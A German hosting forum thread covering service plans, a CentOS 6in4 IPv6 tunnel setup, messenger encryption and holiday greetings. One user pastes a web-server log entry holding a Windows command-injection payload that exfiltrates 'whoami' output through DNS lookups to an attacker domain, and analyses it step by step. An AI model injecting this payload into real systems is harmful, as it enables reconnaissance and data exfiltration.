Das längste Thema

  • Was anderes: Root Server Service Level A+ ich werd nicht ganz schlau aus dem Leistungsumfang. Als ich kürzlich die Domainprobleme hatte, wäre der Notfallsupport sinnvoll gewesen. Bei Domains gibt es meines Wissens keine Serviceerweiterung. Bei den aktuellen Servern sind 99,9% Verfügbarkeit sowieso garantier. Hat es einen Sinn, das Paket zu behalten?


    Sonderleistungen durch Service Level A+

    Bevorzugte Behandlung bei Störung: Ja, gegenüber Kunden ohne Service Level

    Hardwareverfügbarkeit: mindestens 99,9%

    Stromverfügbarkeit: mindestens 99,9%

    Netzwerkverfügbarkeit: mindestens 99,9%


    Reguläre Service Garantien

    Kostenlose Ersatzhardware: JA

    Notfall-Telefonsupport (24/7): JA

    Telefonsupport: JA

    E-Mail-Support (24/7): JA

  • whoami0501

    und das ist bei WhatsApp nicht?


    mein 6in4-server bei netcup flutscht :)

    ist auf CentOS Basis, und so wie das Routing bei netcup realisiert ist, gibt es ein hervorragendes Feature;


    f. Interessierte hier meine Umsetzung mit CentOS


    ich habs mit 2 zusätzlichen /64-Prefixen realisiert,

    würde wahrscheinlich auch nur mit einem gehen, könnte dann aber etwas Tricky sein;


    zur Bezeichnung/Benennung der einzelnen Prefixe und IP-Adressen

    2a03:4000:1:1::/64 (Server-IPv6) bzw. 37.37.37.37 (Server-IPv4)

    geholt hab ich mir 2a03:4000:17:17::/64 (Tunnel-Prefix) und 2a03:4000:31:31::/64 (LAN-Prefix)¹

    und 81.81.81.81 (Home-IPv4)


    zuerst der Server:


    /etc/sysconfig/network-scripts/ifcfg-eth0

    Code
    ...
    IPV6_ROUTER=yes
    # hier eine Adresse hinzufügen, mehr dazu weiter unten ...
    IPV6ADDR_SECONDARIES="... SPECIALADDR ..."

    /etc/sysconfig/network-scripts/ifcfg-sit1

    Code
    # IPv6-in-IPv4 tunnel
    TYPE=SIT
    NAME=sit1
    ONBOOT=yes
    DEVICE=sit1
    BOOTPROTO=none
    IPV6INIT=yes
    IPV6TUNNELIPV4=81.81.81.81
    IPV6TUNNELIPV4LOCAL=37.37.37.37
    IPV6ADDR=2a03:4000:17:17::1/64

    /etc/sysconfig/network-scripts/route6-sit1

    Code
    2a03:4000:17:17::/64 dev sit1 metric 1
    2a03:4000:31:31::/64 via 2a03:4000:17:17::2 dev sit1 metric 1

    /etc/sysconfig/network

    IPV6FORWARDING="yes" hinzufügen


    jetzt der Router zu Hause - ist bei mir ebenfalls ein CentOS, und hier gibt es Unterschiede bzw. Besonderheiten


    /etc/sysconfig/network-scripts/ifcfg-eth0

    Code
    ...
    IPV6_ROUTER=yes
    IPV6ADDR=2a03:4000:31:31::1
    # hier einfach fe80::1 als secondary definieren, dann kann dies einfach als Gateway eingetragen werden
    IPV6ADDR_SECONDARIES="... fe80::1 ..."

    /etc/sysconfig/network-scripts/ifcfg-sit1 ist ähnlich der am Server nur mit vertauschten IPv4 Adressen bzw. das andere Ende vom Tunnel-Prefix

    das Routing funktioniert hier aber anders, man braucht keine eigene Route definieren

    /etc/sysconfig/network beinhaltet hier im Vergleich zum Server etwas mehr

    Code
    IPV6FORWARDING="yes"
    IPV6_DEFAULTGW=2a03:4000:17:17::1
    IPV6_DEFAULTDEV=sit1

    zur Firewall, hier kommt bei mir IPtables/IP6tables zum Einsatz

    IPv4 das Protokoll 41 erlauben, gilt f. beide Teile, sowohl der Router als auch der Server, folgendes in /etc/sysconfig/iptables an entsprechender Stelle hinzufügen, am Router ist das WAN-Interface bei mir eth1 und am Server ist es eth0, daher hier ethX

    Code
    # Enable IPv6-A INPUT -i ethX -p ipv6 -j ACCEPT
    -A OUTPUT -o ethX -p ipv6 -j ACCEPT

    bei IPv6 ist am Server etwas mehr zu tun, folgendes in /etc/sysconfig/ip6tables hinzufügen

    Code
    # ICMP bzw. TRACEroute auch vom LAN erlauben
    -A INPUT -i sit1 -p icmpv6 -j ACCEPT
    -A INPUT -i sit1 -p udp --sport 32769:65535 --dport 33434:33523 -j ACCEPT
    # direkter Weg f. SSH von zu Hause
    -A INPUT -i sit1 -m tcp -p tcp --dport 22 -m state --state NEW -j ACCEPT
    # Enable 6in4 Tunnel traffic
    -I FORWARD -i eth0 -o sit1 -d 2a03:4000:17:17::2,2a03:4000:31:31::/64 -j ACCEPT
    -I FORWARD -i sit1 -o eth0 -s 2a03:4000:17:17::2,2a03:4000:31:31::/64 -j ACCEPT


    jetzt die Besonderheiten


    ich brauchte net.ipv6.conf.all.forwarding = 1 nicht explizit setzen, dies erfolgt durch die Skripte an Hand

    IPV6FORWARDING="yes" in /etc/sysconfig/network


    am Router zu Hause ist klarerweise net.ipv4.ip_forward = 1 gesetzt, beim Server ist das nicht notwendig;


    nachdem man sich bei netcup die Prefixe holt, hat man im SCP im Menüpunkt Netzwerk die Mglkt. den Prefix bei einem VPS/RS zuzuordnen,

    wenn man dies macht, dann zeigt er das an

    beim Tunnel-Prefix:

    2a03:4000:17:17::/64   ->  2a03:4000:1:1:4711:dead:beef:0007

    als auch beim LAN-Prefix:

    2a03:4000:31:31::/64   ->  2a03:4000:1:1:4711:dead:beef:0007

    jeweils darunter kann man rDNS Einträge definieren; und diese IPv6 rechts, ist die 'SECIALADDR' beim Server,

    welche man als zusätzl. IPv6-Adresse am Server definiert;


    jetzt das geniale Feature auf Grund der Umsetzung bei netcup


    man braucht keinen NDP-Proxy:), das klappt nativ zum einem,

    und zum anderen, ist der Tunnel-Prefix bei einem Traceroute von außen ins LAN versteckt, sieht bei mir so aus:


    Code
    # traceroute6 2a03:4000:31:31::1
    traceroute to 2a03:4000:31:31::1 (2a03:4000:31:31::1), 30 hops max, 80 byte packets
    ...
    5  ae3-1337.bbr02.anx25.fra.de.anexia-it.net (2001:7f8::a5e9:0:3)  1.315 ms  1.536 ms  1.487 ms
    6  2a00:11c0:47:1:47::140 (2a00:11c0:47:1:47::140)  4.490 ms  4.370 ms  4.909 ms
    7  2a00:11c0:47:3::21 (2a00:11c0:47:3::21)  4.523 ms  4.732 ms  4.660 ms
    8  2a03:4000:1:1:4711:dead:beef:0007 (2a03:4000:1:1:4711:dead:beef:0007)  4.660 ms  4.601 ms  4.737 ms
    9  2a03:4000:31:31::1 (2a03:4000:31:31::1)  38.772 ms  37.634 ms  41.713 ms  


    es funktioniert damit alles, vielleicht hat der eine od. andere eine Ahnung, wieso beim TRACEroute von zu Hause, Hop2 und Hop3 ident sind, nämlich

    2a03:4000:17:17::1, sprich Tunnel-Prefix::1, dies auch beim HE-IPv6-Tunnel; ist dies bei Dir auch whoami0501 ?

    ¹ sollte jemand wirklich diese Prefixe haben, dann ist das Zufall, war nicht Absicht

    Grüße / Greetings

    Walter H.


    RS, VPS, Webhosting - was man halt so braucht;)

  • und das ist bei WhatsApp nicht?

    Nein, WhatsApp macht das meines Wissens nicht. Wobei ich es nicht nutze.


    Aber bzgl. Verschlüsselung und WhatsApp - den "Goldstandard" der Verschlüsselung unter den Messengern bildet ja eigentlich immer noch Signal. Und WhatsApp nutzt dessen Protokoll, die haben da quasi ganz einfach abgekupfert. Und solange die das ordentlich implementiert haben, ist das von der Sache her auch sicher.


    Problematisch ist bei WhatsApp bzw. damit eigentlich Facebook jedoch eher das Thema mit den Metadaten. Also wer wann mit wem in welcher Ausprägung usw. - das halte ich an der Stelle problematisch. Und wer sagt uns mit 100%iger Sicherheit, dass WhatsApp nicht die privaten Schlüssel des Engerätes auslesen und nach Hause senden kann? Die App ist closed Source, wir können es nicht prüfen.


    Meine erste Wahl in Puncto Messenger und dem Gleichgewicht aus Sicherheit + Privatsphäre sowie usability ist nach wie vor Signal. :)

    "Denn der radikalste Zweifel ist der Vater der Erkenntnis."

    -Max Weber

  • Aus gegebenem Anlass an die Moderatoren: Wenn euch irgendwann bzgl. dieses Threads die Hutschnur platzt, bitte sperrt hier erst mal nur temporär für ein paar Tage/Wochen und macht nicht sofort komplett zu. Ich fände es doch sehr schade, wenn wir dieses "Offtopic-Topic" durch solchen Kram verlieren würden.

  • Da fällt mir gerade auf: habe allen möglichen Leuten frohe Weihnachten gewünscht - nicht aber einen solchen Gruß in dem Forum hinterlassen, in dem ich täglich unterwegs bin. =O


    In diesem Sinne: wünsche euch allen ein frohes Fest mit euren Liebsten. :)

  • Frohe Weihnachten und ein hoffentlich besseres Jahr 2021


    habe soeben folgendes skurriles auf meinem Server in den Webserver-Logs aufgeschnappt

    Code
    13-12-2020; 03:57:37 [#DOMAIN/]: erp.mymegamarket.gr [78.108.43.212:49890] - "&& cmd /v /c "whoami > bli && certutil -encode bli bli2 && findstr /L /V "CERTIFICATE" bli2 > bli3 && set /p MYVAR=<bli3 && set FINAL=!MYVAR!-wininj2-#DOMAIN.01h4x.com && nslookup !FINAL!" && " - [ref.: "&& cmd /v /c "whoami > bli && certutil -encode bli bli2 && findstr /L /V "CERTIFICATE" bli2 > bli3 && set /p MYVAR=<bli3 && set FINAL=!MYVAR!-wininj3-#DOMAIN.01h4x.com && nslookup !FINAL!" && "]

    als User-Agent und als Referer der gleiche Unfug - Ransomware?

    Grüße / Greetings

    Walter H.


    RS, VPS, Webhosting - was man halt so braucht;)

  • Sieht nach klassischer Shell Code Injection bei irgendeinem IoT Gerät aus.

    meinst Du jetzt damit meinen Webserver?

    (ist ein Apache auf einem VPS hier bei netcup unter CentOS)


    zerlegt man des jetzt und läßt da den Trennmarker '&&' weg

    Code
    cmd /v /c "whoami > bli
    certutil -encode bli bli2
    findstr /L /V "CERTIFICATE" bli2 > bli3
    set /p MYVAR=<bli3
    set FINAL=!MYVAR!-wininj3-#DOMAIN.01h4x.com
    nslookup !FINAL!"

    dann sieht des nach stümperhaften Batch-File-Code f. Windows aus ...

    - whoami, findstr, certutil, cmd, nslookup ist alles in Windows vorhanden

    - findstr, cmd sucht man in Linux eher vergebens;)

    Grüße / Greetings

    Walter H.


    RS, VPS, Webhosting - was man halt so braucht;)

  • neugierig wie ich bin, hab ich mir des mal etwas genauer angesehen


    Zeile 1 des cmd .. ignorier ich mal, und whoami > bli legt im File bli z.B. 'TRUMP\Donald' ab


    Zeile 2 des certutil -encode bli bli2 legt im File bli2 die Base64-Kodierung vom Inhalt des Files bli ab

    sieht dann so aus

    Code
    -----BEGIN CERTIFICATE-----
    dHJ1bXBcZG9uYWxkDQo=
    -----END CERTIFICATE-----


    Zeile 3 ist ganz schlau, es legt im File bli3 nur die Zeilen vom File bli2 ab, welche 'CERTIFICATE' nicht enthalten;

    quasi ein grep -v CERTIFICATE bli2 >bli3


    Zeile 4 hat als Ergebnis eine Umgebungsvariable mit dem Inhalt von bli3, also MYVAR=dHJ1bXBcZG9uYWxkDQo=

    in bash würd des dem entsprechen MYVAR="$(cat bli3)"


    Zeile 5 sollte die eigentliche Umgebungvariable FINAL erzeugen, ist aber fehlerhaft; es gibt kein !MYVAR!, sollte wohl %MYVAR% heissen;

    dann ist das Ergebnis eine Umgebungvariable, ich nehm hier mal whitehouse.gov, statt meiner ;)

    das sieht dann so aus

    FINAL=dHJ1bXBcZG9uYWxkDQo=-wininj3-whitehouse.gov.01h4x.com


    Zeile 6 sollte einen nslookup davon ausführen, auch hier ist !FINAL! falsch, sollte %FINAL% heissen;

    also nslookup dHJ1bXBcZG9uYWxkDQo=-wininj3-whitehouse.gov.01h4x.com


    da dieser skurille Log-Eintrag von einer griech. IP (inkl reverse DNS zu irgendwas mit .gr) gemacht wurde,

    die komische 01h4x.com-Domain aber in Israel registriert wurde, könnte hier was im Busch sein;:D

    Grüße / Greetings

    Walter H.


    RS, VPS, Webhosting - was man halt so braucht;)

  • der ORF hat es wieder mal vergeigt;:(

    https://www.nachrichten.at/obe…errohrbruch;art66,3333777

    war nur in der Zeitung zu lesen, ich hab nix mitbekommen, obwohl des gerade mal 3 Straßenzüge zu mir entfernt war ...

    (sorgt ja net f. Einschaltquoten, aber wenn dem Trump ein Baum auf die Zehen fällt schon - echt traurig wenn Nachrichten eines öffentlich rechtlichen Kanals

    Einschaltquoten 'brauchen')

    Grüße / Greetings

    Walter H.


    RS, VPS, Webhosting - was man halt so braucht;)